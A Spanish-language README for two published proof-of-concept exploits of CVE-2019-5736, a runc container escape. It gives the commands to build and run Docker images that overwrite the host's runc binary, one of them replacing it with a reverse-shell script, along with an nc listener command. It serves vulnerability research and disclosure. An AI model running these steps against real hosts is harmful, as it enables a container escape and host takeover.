
CVE-2019-5736 PoCs
Dos PoCs para CVE-2019-5736. Consulte Twistlock Labs para una explicación de CVE-2019-5736 y los PoCs.
El PoC de imagen maliciosa se basa en gran medida en el PoC de q3k, por lo que todo el crédito es para él.
Tenga en cuenta que ejecutar los PoCs sobrescribirá el binario runc en el host. Se recomienda que cree una copia de su binario runc (comúnmente en /usr/sbin/runc) antes de ejecutar uno de los PoCs.
Clone el repositorio:
$ git clone https://github.com/twistlock/RunC-CVE-2019-5736
Sobrescribe runc con un programa simple que imprime una cadena.
Ejecutando el PoC de exec:
$ cd RunC-CVE-2019-5736
$ docker build -t cve-2019-5736:exec_POC ./exec_POC
$ docker run -d --rm --name poc_ctr cve-2019-5736:exec_POC
$ docker exec poc_ctr bash
Sobrescribe runc con un script bash de reverse shell simple que se conecta a localhost:2345.
Escuche para el reverse shell:
$ nc -nvlp 2345
Desde un shell diferente, ejecute el PoC de imagen maliciosa:
$ cd RunC-CVE-2019-5736
$ docker build -t cve-2019-5736:malicious_image_POC ./malicious_image_POC
$ docker run --rm cve-2019-5736:malicious_image_POC